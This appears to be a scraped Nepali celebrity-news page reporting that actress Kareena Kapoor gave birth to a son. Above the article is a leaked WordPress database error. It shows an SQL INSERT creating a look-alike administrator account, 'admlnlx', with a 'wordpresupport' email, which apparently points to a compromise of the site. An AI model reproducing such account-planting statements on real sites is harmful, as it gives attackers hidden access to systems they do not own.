WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BYkpTsLv/.lBKpjXyeBeJLScOaO36u/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 07:15:52', '', 'admlnlx', 'admlnlx')
एजेन्सी । नायिका करिना कपुरलाई पुत्रलाभ भएको छ ।
नायक सैफअली खानसँग लामो समय प्रेम सम्बनध पछि बिबाह गरेकी यि सुन्दरीले आज बिहान ८ बजे छोरालाई जन्म दिएको भारतीय मिडियाले उल्लेख गरेका छन् ।
आज बिहानै अकस्मात पेट दुखन थालेपछि अस्पतालमा भर्ना भएकी करिनाले छोरालाई जन्म दिएकी हुन् ।अहिले अस्पतालमा उनका आफन्त, शुभ चिन्तक र कलाकर्मीको भिड लागेको छ । यद्यपी उनका छोराको तस्विर भने सार्वजनिक गरिएको छैन ।